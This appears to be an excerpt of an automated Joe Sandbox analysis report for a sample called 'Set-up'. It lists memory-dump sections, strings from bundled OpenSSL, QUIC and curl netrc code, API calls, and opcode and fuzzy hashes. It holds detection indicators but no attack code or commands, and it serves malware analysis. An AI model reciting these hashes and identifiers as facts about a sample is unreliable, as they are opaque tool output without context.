                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$@$ssl/quic/quic_txp.c
                          • API String ID: 0-600063881
                          • Opcode ID: 40e0fb81201cad48751bb300bf5aebc4cf765fbd579c8f33c3eeba3015771f25
                          • Instruction ID: 67e707f86fc5639b5f12f956530d4bc5a107d13bbc751745c662d0af02ad4c6c
                          • Opcode Fuzzy Hash: 40e0fb81201cad48751bb300bf5aebc4cf765fbd579c8f33c3eeba3015771f25
                          • Instruction Fuzzy Hash: 2853B0716083418FD724CF28C891FAAB7E1FF84314F1889ADE89997391E771E945CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: default$login$macdef$machine$netrc.c$password
                          • API String ID: 0-1043775505
                          • Opcode ID: 5d1957bdb952dc8ecb432a360e58080e35cfc4a564b431449c9531574582b129
                          • Instruction ID: 114ce6ca78db4cb999318bcaf86cdf8ee1ab4e232df8f2a28d5d2e506fa70157
                          • Opcode Fuzzy Hash: 5d1957bdb952dc8ecb432a360e58080e35cfc4a564b431449c9531574582b129
                          • Instruction Fuzzy Hash: 3DE105B09083819BE711CF149985F2B7BE4AF86718F19482CF8C55B382E3B9D948D793
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: BQ`
                          • API String ID: 0-1649249777
                          • Opcode ID: 5c0ae10d8b821740135186c74aef795f2b4aeba1074306054197b5a6e4e929f0
                          • Instruction ID: b944bd9233b67a25b7e1b9559a40f82a27ee44b622e51df0d4d5de9c2510aea6
                          • Opcode Fuzzy Hash: 5c0ae10d8b821740135186c74aef795f2b4aeba1074306054197b5a6e4e929f0
                          • Instruction Fuzzy Hash: 16A2C271A08716DFC718CF19C4806A9F7E1FF88310F19866DE9AA87786D734E851CBA1
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00C52212,00000000,00000000), ref: 00BD0109
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
                            • Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
                            • Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$strcpy
                          • String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
                          • API String ID: 2790333442-843477118
                          • Opcode ID: 3156254d5c80e73c367a44144bcbb611ae2b1165ff8837e0978d577dbbb33ec6
                          • Instruction ID: 569c36a7c3ed45a143930c2e1293863079009ea15ff72296dc2e76301021a45d
                          • Opcode Fuzzy Hash: 3156254d5c80e73c367a44144bcbb611ae2b1165ff8837e0978d577dbbb33ec6
                          • Instruction Fuzzy Hash: 49E146719183018BD721AB29D88172EF7E1EFA1754F048B6EF9C8A7352F330D9409B82
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,00B0C1CE,?,00000003,?), ref: 00B0E4EE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
                          • API String ID: 1222420520-1997541155
                          • Opcode ID: 573355966cc4794964b154c005add98c0890fb56a94b8f5b2ff1cc9b62a275f7
                          • Instruction ID: 293eb75ad3eb240d884f37ad0e05b89565bb3296f8b399780fb3334aff98f975
                          • Opcode Fuzzy Hash: 573355966cc4794964b154c005add98c0890fb56a94b8f5b2ff1cc9b62a275f7
                          • Instruction Fuzzy Hash: E5E1F532B042105BD7199E3CC88076EBBD7ABD9310F298ABCE9A9C73D1D635DC488785
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 00CCE5F2
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00CCE67F
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00CD003E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: 3a391d511467ddb5f537e882b9362640c7bf7ea1551cc069b280310a7062ed2a
                          • Instruction ID: 211936e0a6a683ab1c8a392a064a8753a84e661ecdb772d662511de60934c918
                          • Opcode Fuzzy Hash: 3a391d511467ddb5f537e882b9362640c7bf7ea1551cc069b280310a7062ed2a
                          • Instruction Fuzzy Hash: E7D23DEAC39B9541E323A67D64522E6E7506FFB248F11EB2BFCD430E52AB2171C44319
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4$`$`
                          • API String ID: 0-1230936812
                          • Opcode ID: 518259cf26a65d942b1d12550548d8e316fbec725f132a278fc422b5876ac12f
                          • Instruction ID: 61f024e39718ba46bea6c6d6207248507a629f21ea5ee2ec5bdb886009664711
                          • Opcode Fuzzy Hash: 518259cf26a65d942b1d12550548d8e316fbec725f132a278fc422b5876ac12f
                          • Instruction Fuzzy Hash: 86B29F729087918FD715CF18C8806AAB7E1FFCA304F198B2EE8D597356D730A945CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: $ $
                          • API String ID: 0-3665324030
                          • Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                          • Instruction ID: 34d786431895bd97a553f63222f3d5c3b9a97c5321eb7b97232c10be3bfec6a6
                          • Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                          • Instruction Fuzzy Hash: 1262CE759083918FC324CF29C49066AFBE1BFC8350F158A2EE9D993355E734E945CBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
                          • API String ID: 0-2745174052
                          • Opcode ID: d1a3298af084a29f0785fdce726c0d24faebe86a85c3848b9cbd63b8940d18d6
                          • Instruction ID: e2c6c10ed81784f54bfeead237cc1736c90889145887e294d8f310644063c06d
                          • Opcode Fuzzy Hash: d1a3298af084a29f0785fdce726c0d24faebe86a85c3848b9cbd63b8940d18d6
                          • Instruction Fuzzy Hash: B0D10471608341ABEB30AB51DC82F6BB7E5FF94704F04086CF989572A2E771E844E762
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12ff8a4c8aa474db4f82cbe38701c0a02b1d83f955c9fb16d0096dd1bf271074
                          • Instruction ID: 7985c1df8e497a9637a2d4366c33e195de5ea47d0588b34bfc9792063a059d61
                          • Opcode Fuzzy Hash: 12ff8a4c8aa474db4f82cbe38701c0a02b1d83f955c9fb16d0096dd1bf271074
                          • Instruction Fuzzy Hash: 29828D72A087559FC724CF28C88066AFBE1FBC4704F198A2EE9D997351D770E845CB92
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00CCE16E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: providers/implementations/kdfs/argon2.c
                          • API String ID: 3510742995-3406374482
                          • Opcode ID: 3659c0edd7248f321d71a78d199acf1be9466a2d8592e6797555789e3ee697a1
                          • Instruction ID: c5d7ca854cc35b1df608f02aeebef4978268f78a8f93768204d457b12b1d8db5
                          • Opcode Fuzzy Hash: 3659c0edd7248f321d71a78d199acf1be9466a2d8592e6797555789e3ee697a1
                          • Instruction Fuzzy Hash: 52513771D087109BC310EB28D841B9AF7E8FF98354F558E2DE986A7242E731F6858785
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00A7608E
                          • BCryptGenRandom.BCRYPT(00000000,?,?,00000002), ref: 00A7609C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: CryptRandommemset
                          • String ID:
                          • API String ID: 642379960-0
                          • Opcode ID: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
                          • Instruction ID: 54cd8b33e942b514fc85ca8324a8bf8ed4c6e3906c9aa358507d9a6d1b0943c2
                          • Opcode Fuzzy Hash: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
                          • Instruction Fuzzy Hash: 48D05E3270939137D664611A6C17F5F5A9CDFC6B20F08402EB508E2282D660A80182B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 6037acdf8c0d040dffe266aa353b1557a857fd1a7bfed82e7ae6749c841beb1b
                          • Instruction ID: 6f38129303464fc877bf2f844220554c9004fec1641a4443e319cf66d3c23caa
                          • Opcode Fuzzy Hash: 6037acdf8c0d040dffe266aa353b1557a857fd1a7bfed82e7ae6749c841beb1b
                          • Instruction Fuzzy Hash: E3E25835A083A18BC714DF6AD49052EFBE2AFC8304F198A2DE9D997351D770EC45CB92
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,00DB22FC,?,?), ref: 00DB447B
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 00DB4760
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
